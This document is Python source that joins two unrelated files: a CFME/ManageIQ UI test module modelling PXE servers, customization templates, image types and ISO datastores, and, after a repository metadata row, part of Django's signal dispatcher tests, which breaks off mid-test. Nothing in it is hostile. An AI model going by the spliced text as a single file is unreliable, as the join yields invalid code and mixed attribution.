        Navigatable.__init__(self, appliance=appliance)
        self.name = name
        self.depot_type = depot_type
        self.uri = uri
        self.userid = userid
        # todo: turn into Credentials class
        self.password = password
        self.access_url = access_url
        self.pxe_dir = pxe_dir
        self.windows_dir = windows_dir
        self.customize_dir = customize_dir
        self.menu_filename = menu_filename

    def create(self, cancel=False, refresh=True, refresh_timeout=120):
        """
        Creates a PXE server object

        Args:
            cancel (boolean): Whether to cancel out of the creation. The cancel is done
                after all the information present in the PXE Server has been filled in the UI.
            refresh (boolean): Whether to run the refresh operation on the PXE server after
                the add has been completed.
        """
        view = navigate_to(self, 'Add')
        view.fill({'name': self.name,
                   'depot_type': self.depot_type,
                   'access_url': self.access_url,
                   'pxe_dir': self.pxe_dir,
                   'windows_images_dir': self.windows_dir,
                   'customization_dir': self.customize_dir,
                   'filename': self.menu_filename,
                   'uri': self.uri,
                   # Samba only
                   'username': self.userid,
                   'password': self.password,
                   'confirm_password': self.password})
        # Credentials must be validated before Add is enabled for Samba depots.
        if self.depot_type == 'Samba' and self.userid and self.password:
            view.validate.click()
        main_view = self.create_view(PXEServersView)
        if cancel:
            view.cancel.click()
            main_view.flash.assert_success_message('Add of new PXE Server '
                                                   'was cancelled by the user')
        else:
            view.add.click()
            main_view.flash.assert_no_error()
            if refresh:
                self.refresh(timeout=refresh_timeout)

    @variable(alias="db")
    def exists(self):
        """
        Checks if the PXE server already exists
        """
        dbs = self.appliance.db.client
        candidates = list(dbs.session.query(dbs["pxe_servers"]))
        return self.name in [s.name for s in candidates]

    @exists.variant('ui')
    def exists_ui(self):
        """
        Checks if the PXE server already exists
        """
        # EAFP: navigation failure to the Details page means it does not exist.
        try:
            navigate_to(self, 'Details')
            return True
        except NoSuchElementException:
            return False

    def update(self, updates, cancel=False):
        """
        Updates a PXE server in the UI. Better to use utils.update.update context
        manager than call this directly.

        Args:
            updates (dict): fields that are changing.
            cancel (boolean): whether to cancel out of the update.
        """
        view = navigate_to(self, 'Edit')
        view.fill(updates)
        # Re-validate when credentials change, otherwise Save stays disabled.
        if updates.get('userid') or updates.get('password'):
            view.validate.click()
        name = updates.get('name') or self.name
        main_view = self.create_view(PXEServersView, override=updates)
        if cancel:
            view.cancel.click()
            main_view.flash.assert_success_message('Edit of PXE Server "{}" was '
                                                   'cancelled by the user'.format(name))
        else:
            view.save.click()
            main_view.flash.assert_no_error()

    def delete(self, cancel=True):
        """
        Deletes a PXE server from CFME

        Args:
            cancel: Whether to cancel the deletion, defaults to True
        """
        view = navigate_to(self, 'Details')
        # Menu item text changed in 5.9; VersionPick resolves the right one.
        view.toolbar.configuration.item_select(VersionPick({
            Version.lowest(): 'Remove this PXE Server',
            '5.9': 'Remove this PXE Server from Inventory'}).pick(self.appliance.version),
            handle_alert=not cancel)
        if not cancel:
            main_view = self.create_view(PXEServersView)
            main_view.flash.assert_no_error()
        else:
            navigate_to(self, 'Details')

    def refresh(self, wait=True, timeout=120):
        """ Refreshes the PXE relationships and waits for it to be updated
        """
        view = navigate_to(self, 'Details')
        last_time = view.entities.basic_information.get_text_of('Last Refreshed On')
        view.toolbar.configuration.item_select('Refresh Relationships', handle_alert=True)
        view.flash.assert_success_message('PXE Server "{}": Refresh Relationships '
                                          'successfully initiated'.format(self.name))
        if wait:
            # Poll until the 'Last Refreshed On' timestamp changes.
            basic_info = view.entities.basic_information
            wait_for(lambda lt: lt != basic_info.get_text_of('Last Refreshed On'),
                     func_args=[last_time], fail_func=view.toolbar.reload.click, num_sec=timeout,
                     message="pxe refresh")

    @variable(alias='db')
    def get_pxe_image_type(self, image_name):
        """Return the image type name for ``image_name`` via the DB, or None."""
        pxe_i = self.appliance.db.client["pxe_images"]
        pxe_s = self.appliance.db.client["pxe_servers"]
        pxe_t = self.appliance.db.client["pxe_image_types"]
        hosts = list(self.appliance.db.client.session.query(pxe_t.name)
                     .join(pxe_i, pxe_i.pxe_image_type_id == pxe_t.id)
                     .join(pxe_s, pxe_i.pxe_server_id == pxe_s.id)
                     .filter(pxe_s.name == self.name)
                     .filter(pxe_i.name == image_name))
        if hosts:
            return hosts[0][0]
        else:
            return None

    @get_pxe_image_type.variant('ui')
    def get_pxe_image_type_ui(self, image_name):
        """Return the image type name for ``image_name`` by reading the UI."""
        view = navigate_to(self, 'Details')
        view.sidebar.servers.tree.click_path('All PXE Servers', self.name,
                                             'PXE Images', image_name)
        details_view = self.create_view(PXESystemImageTypeDetailsView)
        return details_view.entities.basic_information.get_text_of('Type')

    def set_pxe_image_type(self, image_name, image_type):
        """
        Function to set the image type of a PXE image
        """
        # todo: maybe create appropriate navmazing destinations instead ?
        # No-op when the image already has the requested type.
        if self.get_pxe_image_type(image_name) != image_type:
            view = navigate_to(self, 'Details')
            view.sidebar.servers.tree.click_path('All PXE Servers', self.name,
                                                 'PXE Images', image_name)
            details_view = self.create_view(PXESystemImageTypeDetailsView)
            details_view.toolbar.configuration.item_select('Edit this PXE Image')
            edit_view = self.create_view(PXEImageEditView)
            edit_view.fill({'type': image_type})
            edit_view.save.click()
@navigator.register(PXEServer, 'All')
class PXEServerAll(CFMENavigateStep):
    """Navigate to the 'All PXE Servers' tree node."""
    VIEW = PXEServersView
    prerequisite = NavigateToSibling('PXEMainPage')

    def step(self):
        # NOTE(review): uses self.view rather than self.prerequisite_view,
        # unlike sibling steps -- verify this is intended.
        self.view.sidebar.servers.tree.click_path('All PXE Servers')
@navigator.register(PXEServer, 'Add')
class PXEServerAdd(CFMENavigateStep):
    """Navigate to the 'Add a New PXE Server' form."""
    VIEW = PXEServerAddView
    prerequisite = NavigateToSibling('All')

    def step(self):
        self.prerequisite_view.toolbar.configuration.item_select('Add a New PXE Server')
@navigator.register(PXEServer, 'Details')
class PXEServerDetails(CFMENavigateStep):
    """Navigate to a specific PXE server's details page."""
    VIEW = PXEServerDetailsView
    prerequisite = NavigateToSibling('All')

    def step(self):
        self.prerequisite_view.sidebar.servers.tree.click_path('All PXE Servers', self.obj.name)
@navigator.register(PXEServer, 'Edit')
class PXEServerEdit(CFMENavigateStep):
    """Navigate to the Edit form of a specific PXE server."""
    VIEW = PXEServerEditView
    prerequisite = NavigateToSibling('Details')

    def step(self):
        self.prerequisite_view.toolbar.configuration.item_select('Edit this PXE Server')
class PXECustomizationTemplatesView(PXEMainView):
    """
    represents Customization Template Groups page
    """
    # Overrides the base ``entities`` with the template-folders table; the
    # flat records table is exposed separately as ``table``.
    entities = Table(locator='.//div[@id="template_folders_div"]/table')
    table = Table("//div[@id='main_div']//table")

    @property
    def is_displayed(self):
        return (super(PXECustomizationTemplatesView, self).is_displayed and
                self.title.text == 'All Customization Templates - System Image Types')
class PXECustomizationTemplateDetailsView(PXEMainView):
    """
    represents some certain Customization Template Details page
    """
    toolbar = View.nested(PXEDetailsToolBar)

    @View.nested
    class entities(View):  # noqa
        basic_information = SummaryTable(title="Basic Information")
        script = ScriptBox(locator='//textarea[contains(@id, "script_data")]')

    @property
    def is_displayed(self):
        """True when the page title names this customization template."""
        if getattr(self.context['object'], 'name'):
            # str.format with a named placeholder requires a keyword argument;
            # the previous positional call raised KeyError('name').
            title = 'Customization Template "{name}"'.format(
                name=self.context['object'].name)
            # The title Text widget is declared on the view itself (inherited
            # from PXEMainView); the nested ``entities`` view has no title.
            return (super(PXECustomizationTemplateDetailsView, self).is_displayed and
                    self.title.text == title)
        else:
            return False
class PXECustomizationTemplateForm(View):
    """Common form widgets shared by Add/Edit/Copy customization template views."""
    title = Text('//div[@id="main-content"]//h1')
    name = Input(id='name')
    description = Input(id='description')
    image_type = BootstrapSelect(id='img_typ')
    type = BootstrapSelect(id='typ')
    script = ScriptBox(locator='//textarea[contains(@id, "script_data")]')

    @property
    def is_displayed(self):
        # Shared form base; concrete subclasses are navigated to directly.
        return False
class PXECustomizationTemplateAddView(PXECustomizationTemplateForm):
    """Add Customization Template form."""
    add = Button('Add')
    cancel = Button('Cancel')
class PXECustomizationTemplateEditView(PXECustomizationTemplateForm):
    """Edit Customization Template form."""
    save = Button('Save')
    reset = Button('Reset')
    cancel = Button('Cancel')
class PXECustomizationTemplateCopyView(PXECustomizationTemplateForm):
    """Copy Customization Template form (an Add form reached from Details)."""
    toolbar = View.nested(PXEDetailsToolBar)
    add = Button('Add')
    cancel = Button('Cancel')
@attr.s
class CustomizationTemplate(Updateable, Pretty, BaseEntity):
    """
    Model of a Customization Template in CFME
    """
    pretty_attrs = ['name', 'image_type']

    name = attr.ib(default=None)
    description = attr.ib(default=None)
    script_data = attr.ib(default=None)
    image_type = attr.ib(default=None)
    script_type = attr.ib(default=None)

    @variable(alias='db')
    def exists(self):
        """
        Checks if the Customization template already exists
        """
        dbs = self.appliance.db.client
        candidates = list(dbs.session.query(dbs["customization_templates"]))
        return self.name in [s.name for s in candidates]

    @exists.variant('ui')
    def exists_ui(self):
        """
        Checks if the Customization template already exists
        """
        try:
            navigate_to(self, 'Details')
            return True
        except NoSuchElementException:
            return False

    def update(self, updates, cancel=False):
        """
        Updates a Customization Template server in the UI. Better to use utils.update.update
        context manager than call this directly.

        Args:
            updates (dict): fields that are changing.
            cancel (boolean): whether to cancel out of the update.
        """
        # Normalize a None selection to the placeholder option.
        # NOTE(review): because of the ``elif``, only one of image_type /
        # script_type is normalized per call -- verify this is intended.
        if 'image_type' in updates and updates['image_type'] is None:
            updates['image_type'] = '<Choose>'
        elif 'script_type' in updates and updates['script_type'] is None:
            updates['script_type'] = '<Choose>'
        view = navigate_to(self, 'Edit')
        view.fill(updates)
        main_view = self.create_view(PXECustomizationTemplatesView, override=updates)
        if cancel:
            view.cancel.click()
        else:
            view.save.click()
        main_view.flash.assert_no_error()

    def copy(self, name=None, description=None, cancel=False):
        """
        This method is used to copy a Customization Template server via UI.

        Args:
            name (str): This field contains the name of the newly copied Customization Template.
            description (str) : This field contains the description of the newly
            copied Customization Template.
            cancel (bool): It's used for flag to cancel or not the copy operation.
        """
        view = navigate_to(self, 'Copy')
        # Default to the UI's own "Copy of ..." naming convention.
        name = name or 'Copy of {}'.format(self.name)
        description = description or 'Copy of {}'.format(self.description)
        view.fill({'name': name, 'description': description})
        customization_template = self.parent.instantiate(name, description, self.script_data,
                                                         self.image_type, self.script_type)
        if cancel:
            view.cancel.click()
        else:
            view.add.click()
        main_view = self.create_view(PXECustomizationTemplatesView)
        main_view.flash.assert_no_error()
        # Returned entity is instantiated even when the copy was cancelled.
        return customization_template
@attr.s
class CustomizationTemplateCollection(BaseCollection):
    """Collection class for CustomizationTemplate"""
    ENTITY = CustomizationTemplate

    def create(self, name, description, image_type, script_type, script_data, cancel=False):
        """
        Creates a Customization Template object

        Args:
            cancel (boolean): Whether to cancel out of the creation. The cancel is done
                after all the information present in the CT has been filled in the UI.
            name: Name of CT
            description:description: The description field of CT.
            image_type: Image type of the CT.
            script_data: Contains the script data.
            script_type: It specifies the script_type of the script.
        """
        # Note: instantiate() takes (name, description, script_data, image_type,
        # script_type) -- argument order differs from this method's signature.
        customization_templates = self.instantiate(name, description, script_data,
                                                   image_type, script_type)
        view = navigate_to(self, 'Add')
        view.fill({'name': name,
                   'description': description,
                   'image_type': image_type,
                   'type': script_type,
                   'script': script_data})
        main_view = self.create_view(PXECustomizationTemplatesView)
        if cancel:
            view.cancel.click()
        else:
            view.add.click()
        main_view.flash.assert_no_error()
        return customization_templates

    def delete(self, cancel=False, *ct_objs):
        """
        Deletes a Customization Template server from CFME

        Args:
            ct_objs: It's a Customization Template object
            cancel: Whether to cancel the deletion, defaults to True
        """
        # NOTE(review): ``cancel`` precedes *ct_objs, so callers must pass it
        # positionally before the entities -- awkward but kept for compat.
        for ct_obj in ct_objs:
            view = navigate_to(ct_obj, 'Details')
            view.toolbar.configuration.item_select('Remove this Customization Template',
                                                   handle_alert=not cancel)
            view = ct_obj.create_view(PXECustomizationTemplatesView)
            view.flash.assert_no_error()
@navigator.register(CustomizationTemplateCollection, 'All')
class CustomizationTemplateAll(CFMENavigateStep):
    """Navigate to the root of the Customization Templates accordion."""
    VIEW = PXECustomizationTemplatesView
    prerequisite = NavigateToSibling('PXEMainPage')

    def step(self):
        self.view.sidebar.templates.tree.click_path(('All Customization Templates - '
                                                     'System Image Types'))
@navigator.register(CustomizationTemplateCollection, 'Add')
class CustomizationTemplateAdd(CFMENavigateStep):
    """Navigate to the 'Add a New Customization Template' form."""
    VIEW = PXECustomizationTemplateAddView
    prerequisite = NavigateToSibling('All')

    def step(self):
        self.prerequisite_view.toolbar.configuration.item_select('Add a New Customization Template')
@navigator.register(CustomizationTemplate, 'Details')
class CustomizationTemplateDetails(CFMENavigateStep):
    """Navigate to a template's details via its image-type folder."""
    VIEW = PXECustomizationTemplateDetailsView
    prerequisite = NavigateToAttribute('parent', 'All')

    def step(self):
        tree = self.view.sidebar.templates.tree
        tree.click_path('All Customization Templates - System Image Types', self.obj.image_type,
                        self.obj.name)
@navigator.register(CustomizationTemplate, 'Copy')
class CustomizationTemplateCopy(CFMENavigateStep):
    """Navigate to the 'Copy this Customization Template' form."""
    VIEW = PXECustomizationTemplateCopyView
    prerequisite = NavigateToSibling('Details')

    def step(self):
        # NOTE(review): uses self.view (the destination) rather than
        # self.prerequisite_view for the toolbar -- verify intended.
        self.view.toolbar.configuration.item_select("Copy this Customization Template")
@navigator.register(CustomizationTemplate, 'Edit')
class CustomizationTemplateEdit(CFMENavigateStep):
    """Navigate to the 'Edit this Customization Template' form."""
    VIEW = PXECustomizationTemplateEditView
    prerequisite = NavigateToSibling('Details')

    def step(self):
        self.prerequisite_view.toolbar.configuration.item_select('Edit this Customization Template')
class PXESystemImageTypesView(PXEMainView):
    """
    represents whole All System Image Types page
    """
    @property
    def is_displayed(self):
        return (super(PXESystemImageTypesView, self).is_displayed and
                self.title.text == 'All System Image Types')
class PXESystemImageTypeDetailsView(PXEMainView):
    """Details page of a single System Image Type."""
    toolbar = View.nested(PXEDetailsToolBar)

    @View.nested
    class entities(View):  # noqa
        basic_information = SummaryTable(title="Basic Information")

    @property
    def is_displayed(self):
        # NOTE(review): always False -- navmazing re-runs navigation each time.
        return False
class PXESystemImageTypeForm(View):
    """Common form widgets shared by the Add and Edit System Image Type views."""
    title = Text('//div[@id="main-content"]//h1')
    name = Input(id='name')
    type = BootstrapSelect(id='provision_type')

    @property
    def is_displayed(self):
        return False
class PXESystemImageTypeAddView(PXESystemImageTypeForm):
    """Add System Image Type form."""
    add = Button('Add')
    cancel = Button('Cancel')
class PXESystemImageTypeEditView(PXESystemImageTypeForm):
    """Edit System Image Type form."""
    save = Button('Save')
    reset = Button('Reset')
    cancel = Button('Cancel')
@attr.s
class SystemImageType(Updateable, Pretty, BaseEntity):
    """Model of a System Image Type in CFME.

    Args:
        name: The name of the System Image Type.
        provision_type: The provision type, either Vm or Host.
    """
    pretty_attrs = ['name', 'provision_type']

    # Values accepted by the provision-type selector in the UI.
    VM_OR_INSTANCE = "VM and Instance"
    HOST_OR_NODE = "Host / Node"

    name = attr.ib(default=None)
    provision_type = attr.ib(default=None)

    def update(self, updates, cancel=False):
        """
        Updates a System Image Type in the UI. Better to use utils.update.update context
        manager than call this directly.

        Args:
            updates (dict): fields that are changing.
            cancel (boolean): whether to cancel out of the update.
        """
        view = navigate_to(self, 'Edit')
        view.fill({'name': updates.get('name'), 'type': updates.get('provision_type')})
        if cancel:
            view.cancel.click()
        else:
            view.save.click()
        # No flash message

    def delete(self, cancel=True):
        """
        Deletes a System Image Type from CFME

        Args:
            cancel: Whether to cancel the deletion, defaults to True
        """
        view = navigate_to(self, 'Details')
        view.toolbar.configuration.item_select('Remove this System Image Type',
                                               handle_alert=not cancel)
        if not cancel:
            main_view = self.create_view(PXESystemImageTypesView)
            msg = 'System Image Type "{}": Delete successful'.format(self.name)
            main_view.flash.assert_success_message(msg)
        else:
            navigate_to(self, 'Details')
@attr.s
class SystemImageTypeCollection(BaseCollection):
    """ Collection class for SystemImageType. """
    ENTITY = SystemImageType

    def create(self, name, provision_type, cancel=False):
        """
        Creates a System Image Type object

        Args:
            name: It contains name of the System Image Type
            provision_type: Type on Image. i.e Vm and Instance or Host
            cancel (boolean): Whether to cancel out of the creation. The cancel is done
                after all the information present in the SIT has been filled in the UI.
        """
        system_image_type = self.instantiate(name, provision_type)
        view = navigate_to(self, 'Add')
        view.fill({'name': name, 'type': provision_type})
        if cancel:
            view.cancel.click()
            msg = 'Add of new System Image Type was cancelled by the user'
        else:
            view.add.click()
            msg = 'System Image Type "{}" was added'.format(name)
        main_view = self.create_view(PXESystemImageTypesView)
        main_view.flash.assert_success_message(msg)
        # Returned entity is instantiated even when the add was cancelled.
        return system_image_type

    def delete(self, cancel=False, *sys_objs):
        """
        This methods deletes the System Image Type using select option,
        hence can be used for multiple delete.

        Args:
            cancel: This is the boolean argument required for handle_alert
            sys_objs: It's System Image Types object
        """
        # NOTE(review): ``cancel`` precedes *sys_objs, so it must be passed
        # positionally before the entities -- kept for compatibility.
        view = navigate_to(self, 'All')
        for sys_obj in sys_objs:
            # Select each row's checkbox (first cell) before bulk removal.
            view.entities.row(Name=sys_obj.name)[0].click()
        view.toolbar.configuration.item_select("Remove System Image Types", handle_alert=not cancel)
        main_view = self.create_view(PXESystemImageTypesView)
        main_view.flash.assert_no_error()
@navigator.register(SystemImageTypeCollection, 'All')
class SystemImageTypeAll(CFMENavigateStep):
    """Navigate to the 'All System Image Types' tree node."""
    VIEW = PXESystemImageTypesView
    prerequisite = NavigateToSibling('PXEMainPage')

    def step(self):
        self.view.sidebar.image_types.tree.click_path('All System Image Types')
@navigator.register(SystemImageTypeCollection, 'Add')
class SystemImageTypeAdd(CFMENavigateStep):
    """Navigate to the 'Add a new System Image Type' form."""
    VIEW = PXESystemImageTypeAddView
    prerequisite = NavigateToSibling('All')

    def step(self):
        self.prerequisite_view.toolbar.configuration.item_select('Add a new System Image Type')
@navigator.register(SystemImageType, 'Details')
class SystemImageTypeDetails(CFMENavigateStep):
    """Navigate to a specific System Image Type's details page."""
    VIEW = PXESystemImageTypeDetailsView
    prerequisite = NavigateToAttribute('parent', 'All')

    def step(self):
        self.prerequisite_view.sidebar.image_types.tree.click_path('All System Image Types',
                                                                   self.obj.name)
@navigator.register(SystemImageType, 'Edit')
class SystemImageTypeEdit(CFMENavigateStep):
    """Navigate to the 'Edit this System Image Type' form."""
    VIEW = PXESystemImageTypeEditView
    prerequisite = NavigateToSibling('Details')

    def step(self):
        self.prerequisite_view.toolbar.configuration.item_select('Edit this System Image Type')
class PXEDatastoresView(PXEMainView):
    """
    represents whole All ISO Datastores page
    """
    @property
    def is_displayed(self):
        return (super(PXEDatastoresView, self).is_displayed and
                self.title.text == 'All ISO Datastores')
class PXEDatastoreDetailsView(PXEMainView):
    """Details page of a single ISO Datastore."""
    toolbar = View.nested(PXEDetailsToolBar)

    @View.nested
    class entities(View):  # noqa
        basic_information = SummaryTable(title="Basic Information")

    @property
    def is_displayed(self):
        # NOTE(review): always False -- navmazing re-runs navigation each time.
        return False
class PXEDatastoreForm(View):
    """Common form widgets shared by the Add and Edit ISO Datastore views."""
    title = Text('//div[@id="main-content"]//h1')
    provider = BootstrapSelect(id='ems_id')

    @property
    def is_displayed(self):
        return False
class PXEDatastoreAddView(PXEDatastoreForm):
    """Add ISO Datastore form."""
    add = Button('Add')
    cancel = Button('Cancel')
class PXEDatastoreEditView(PXEDatastoreForm):
    """Edit ISO Datastore form."""
    save = Button('Save')
    reset = Button('Reset')
    cancel = Button('Cancel')
class ISODatastore(Updateable, Pretty, Navigatable):
    """Model of a PXE Server object in CFME

    Args:
        provider: Provider name.
    """
    _param_name = ParamClassName('ds_name')
    pretty_attrs = ['provider']

    def __init__(self, provider=None, appliance=None):
        Navigatable.__init__(self, appliance=appliance)
        self.provider = provider

    def create(self, cancel=False, refresh=True, refresh_timeout=120):
        """
        Creates an ISO datastore object

        Args:
            cancel (boolean): Whether to cancel out of the creation. The cancel is done
                after all the information present in the ISO datastore has been filled in the UI.
            refresh (boolean): Whether to run the refresh operation on the ISO datastore after
                the add has been completed.
        """
        view = navigate_to(self, 'Add')
        view.fill({'provider': self.provider})
        main_view = self.create_view(PXEDatastoresView)
        if cancel:
            view.cancel.click()
            msg = 'Add of new ISO Datastore was cancelled by the user'
        else:
            view.add.click()
            msg = 'ISO Datastore "{}" was added'.format(self.provider)
        main_view.flash.assert_success_message(msg)
        if refresh:
            self.refresh(timeout=refresh_timeout)

    @variable(alias='db')
    def exists(self):
        """
        Checks if the ISO Datastore already exists via db
        """
        iso = self.appliance.db.client['iso_datastores']
        ems = self.appliance.db.client['ext_management_systems']
        name = self.provider
        iso_ds = list(self.appliance.db.client.session.query(iso.id)
                      .join(ems, iso.ems_id == ems.id)
                      .filter(ems.name == name))
        if iso_ds:
            return True
        else:
            return False

    @exists.variant('ui')
    def exists_ui(self):
        """
        Checks if the ISO Datastore already exists via UI
        """
        try:
            navigate_to(self, 'Details')
            return True
        except NoSuchElementException:
            return False

    def delete(self, cancel=True):
        """
        Deletes an ISO Datastore from CFME

        Args:
            cancel: Whether to cancel the deletion, defaults to True
        """
        view = navigate_to(self, 'Details')
        # Menu item text changed in 5.9.
        msg = 'Remove this ISO Datastore'
        if self.appliance.version >= '5.9':
            msg = 'Remove this ISO Datastore from Inventory'
        view.toolbar.configuration.item_select(msg, handle_alert=not cancel)
        if not cancel:
            main_view = self.create_view(PXEDatastoresView)
            msg = 'ISO Datastore "{}": Delete successful'.format(self.provider)
            main_view.flash.assert_success_message(msg)
        else:
            navigate_to(self, 'Details')

    def refresh(self, wait=True, timeout=120):
        """ Refreshes the PXE relationships and waits for it to be updated
        """
        view = navigate_to(self, 'Details')
        basic_info = view.entities.basic_information
        last_time = basic_info.get_text_of('Last Refreshed On')
        view.toolbar.configuration.item_select('Refresh Relationships', handle_alert=True)
        view.flash.assert_success_message(('ISO Datastore "{}": Refresh Relationships successfully '
                                           'initiated'.format(self.provider)))
        if wait:
            # Poll until the 'Last Refreshed On' timestamp changes.
            wait_for(lambda lt: lt != basic_info.get_text_of('Last Refreshed On'),
                     func_args=[last_time], fail_func=view.toolbar.reload.click, num_sec=timeout,
                     message="iso refresh")

    def set_iso_image_type(self, image_name, image_type):
        """
        Function to set the image type of a PXE image
        """
        # NOTE(review): fill/save are attempted on the 'All' view, which does
        # not declare image_type/save widgets -- presumably an edit view is
        # displayed after the toolbar selection; verify this actually works.
        view = navigate_to(self, 'All')
        view.sidebar.datastores.tree.click_path('All ISO Datastores', self.provider,
                                                'ISO Images', image_name)
        view.toolbar.configuration.item_select('Edit this ISO Image')
        view.fill({'image_type': image_type})
        # Click save if enabled else click Cancel
        if view.save.active:
            view.save.click()
        else:
            view.cancel.click()
@navigator.register(ISODatastore, 'All')
class ISODatastoreAll(CFMENavigateStep):
    """Navigate to the 'All ISO Datastores' tree node."""
    VIEW = PXEDatastoresView
    prerequisite = NavigateToSibling('PXEMainPage')

    def step(self):
        self.view.sidebar.datastores.tree.click_path("All ISO Datastores")
@navigator.register(ISODatastore, 'Add')
class ISODatastoreAdd(CFMENavigateStep):
    """Navigate to the 'Add a New ISO Datastore' form."""
    VIEW = PXEDatastoreAddView
    prerequisite = NavigateToSibling('All')

    def step(self):
        self.prerequisite_view.toolbar.configuration.item_select('Add a New ISO Datastore')
@navigator.register(ISODatastore, 'Details')
class ISODatastoreDetails(CFMENavigateStep):
    """Navigate to the details page of a single ISO datastore."""
    VIEW = PXEDatastoreDetailsView
    prerequisite = NavigateToSibling('All')

    def step(self):
        # NOTE(review): uses self.view where the sibling Add step uses
        # self.prerequisite_view -- confirm both resolve to the same page here.
        self.view.sidebar.datastores.tree.click_path("All ISO Datastores", self.obj.provider)
@navigator.register(PXEServer, 'PXEMainPage')
@navigator.register(CustomizationTemplateCollection, 'PXEMainPage')
@navigator.register(SystemImageTypeCollection, 'PXEMainPage')
@navigator.register(ISODatastore, 'PXEMainPage')
class PXEMainPage(CFMENavigateStep):
    """Shared entry point for every PXE entity: the main PXE page."""
    prerequisite = NavigateToAttribute('appliance.server', 'LoggedIn')

    def step(self):
        self.prerequisite_view.navigation.select('Compute', 'Infrastructure', 'PXE')
def get_template_from_config(template_config_name, create=False, appliance=None):
    """Build a customization template object from the yaml config.

    Args:
        template_config_name: key under ``customization_templates`` in cfme_data.
        create: when True, also create the template on the appliance if it does
            not already exist; otherwise only instantiate the object.
        appliance: the appliance whose collections are used; required.

    Returns:
        The instantiated (and possibly created) customization template.

    Raises:
        ValueError: if no appliance is given.
        KeyError: if ``template_config_name`` is missing from the yamls.
    """
    if appliance is None:
        # Explicit error instead of `assert`: asserts are stripped when
        # Python runs with -O, which would let a None appliance slip through.
        raise ValueError("get_template_from_config requires an appliance")
    template_config = conf.cfme_data.get('customization_templates', {})[template_config_name]
    # load the script template and apply the configured replacements
    script_file = load_data_file(str(project_path.join(template_config['script_file'])),
                                 replacements=template_config['replacements'])
    script_data = script_file.read()
    collection = appliance.collections.customization_templates
    kwargs = {
        'name': template_config['name'],
        'description': template_config['description'],
        'image_type': template_config['image_type'],
        'script_type': template_config['script_type'],
        'script_data': script_data,
    }
    customization_template = collection.instantiate(**kwargs)
    if create and not customization_template.exists():
        return collection.create(**kwargs)
    return customization_template
def get_pxe_server_from_config(pxe_config_name, appliance):
    """Build a PXEServer object from the 'pxe_servers' section of the yamls."""
    cfg = conf.cfme_data.get('pxe_servers', {})[pxe_config_name]
    return PXEServer(
        name=cfg['name'],
        depot_type=cfg['depot_type'],
        uri=cfg['uri'],
        # credentials are optional; empty strings collapse to None
        userid=cfg.get('userid') or None,
        password=cfg.get('password') or None,
        access_url=cfg['access_url'],
        pxe_dir=cfg['pxe_dir'],
        windows_dir=cfg['windows_dir'],
        customize_dir=cfg['customize_dir'],
        menu_filename=cfg['menu_filename'],
        appliance=appliance,
    )
def remove_all_pxe_servers():
    """Delete every PXE server listed on the PXE 'All' page, if any."""
    view = navigate_to(PXEServer, 'All')
    if not view.entities.is_displayed:
        # nothing listed -> nothing to remove
        return
    for row in view.entities.rows():
        row[0].check()
    view.toolbar.configuration.item_select('Remove PXE Servers', handle_alert=True)
| gpl-2.0 |
sdcooke/django | tests/dispatch/tests.py | 346 | 6627 | import gc
import sys
import time
import unittest
import weakref
from types import TracebackType
from django.dispatch import Signal, receiver
if sys.platform.startswith('java'):
    def garbage_collect():
        """Collect, then give the JVM's finalizer thread time to run."""
        # Some JVM GCs execute finalizers on a separate thread; sleep
        # briefly so their effects are observable before the test goes on.
        gc.collect()
        time.sleep(0.1)
elif hasattr(sys, "pypy_version_info"):
    def garbage_collect():
        """Collect twice: PyPy may need two passes to clear weakrefs."""
        gc.collect()
        gc.collect()
else:
    def garbage_collect():
        """CPython: a single collection suffices."""
        gc.collect()
def receiver_1_arg(val, **kwargs):
    """Signal receiver that simply echoes back its ``val`` argument."""
    return val
class Callable(object):
    """Receiver usable either as a callable instance or via its ``a`` method."""

    def __call__(self, val, **kwargs):
        """Echo ``val`` when the instance itself is connected as a receiver."""
        return val

    def a(self, val, **kwargs):
        """Echo ``val``; bound-method variant used by the weakref tests."""
        return val
# Module-level signals shared by the test cases below; every test is
# expected to disconnect its receivers so each signal ends the test clean.
a_signal = Signal(providing_args=["val"])
b_signal = Signal(providing_args=["val"])
c_signal = Signal(providing_args=["val"])
# use_caching=True exercises the weakref-keyed per-sender receiver cache.
d_signal = Signal(providing_args=["val"], use_caching=True)
class DispatcherTests(unittest.TestCase):
    """Test suite for dispatcher (barely started)"""

    def assertTestIsClean(self, signal):
        """Assert that everything has been cleaned up automatically"""
        # Note that dead weakref cleanup happens as side effect of using
        # the signal's receivers through the signals API. So, first do a
        # call to an API method to force cleanup.
        self.assertFalse(signal.has_listeners())
        self.assertEqual(signal.receivers, [])

    def test_exact(self):
        # A receiver connected for a specific sender fires for that sender.
        a_signal.connect(receiver_1_arg, sender=self)
        expected = [(receiver_1_arg, "test")]
        result = a_signal.send(sender=self, val="test")
        self.assertEqual(result, expected)
        a_signal.disconnect(receiver_1_arg, sender=self)
        self.assertTestIsClean(a_signal)

    def test_ignored_sender(self):
        # A receiver connected without a sender fires for any sender.
        a_signal.connect(receiver_1_arg)
        expected = [(receiver_1_arg, "test")]
        result = a_signal.send(sender=self, val="test")
        self.assertEqual(result, expected)
        a_signal.disconnect(receiver_1_arg)
        self.assertTestIsClean(a_signal)

    def test_garbage_collected(self):
        # A receiver held only through a bound-method weakref disappears
        # once its instance is collected.
        a = Callable()
        a_signal.connect(a.a, sender=self)
        expected = []
        del a
        garbage_collect()
        result = a_signal.send(sender=self, val="test")
        self.assertEqual(result, expected)
        self.assertTestIsClean(a_signal)

    def test_cached_garbaged_collected(self):
        """
        Make sure signal caching sender receivers don't prevent garbage
        collection of senders.
        """
        class sender:
            pass
        wref = weakref.ref(sender)
        d_signal.connect(receiver_1_arg)
        d_signal.send(sender, val='garbage')
        del sender
        garbage_collect()
        try:
            self.assertIsNone(wref())
        finally:
            # Disconnect after reference check since it flushes the tested cache.
            d_signal.disconnect(receiver_1_arg)

    def test_multiple_registration(self):
        # Connecting the same receiver repeatedly registers it only once.
        a = Callable()
        a_signal.connect(a)
        a_signal.connect(a)
        a_signal.connect(a)
        a_signal.connect(a)
        a_signal.connect(a)
        a_signal.connect(a)
        result = a_signal.send(sender=self, val="test")
        self.assertEqual(len(result), 1)
        self.assertEqual(len(a_signal.receivers), 1)
        del a
        del result
        garbage_collect()
        self.assertTestIsClean(a_signal)

    def test_uid_registration(self):
        # Two receivers sharing a dispatch_uid count as one registration
        # and can be disconnected by uid alone.
        def uid_based_receiver_1(**kwargs):
            pass

        def uid_based_receiver_2(**kwargs):
            pass
        a_signal.connect(uid_based_receiver_1, dispatch_uid="uid")
        a_signal.connect(uid_based_receiver_2, dispatch_uid="uid")
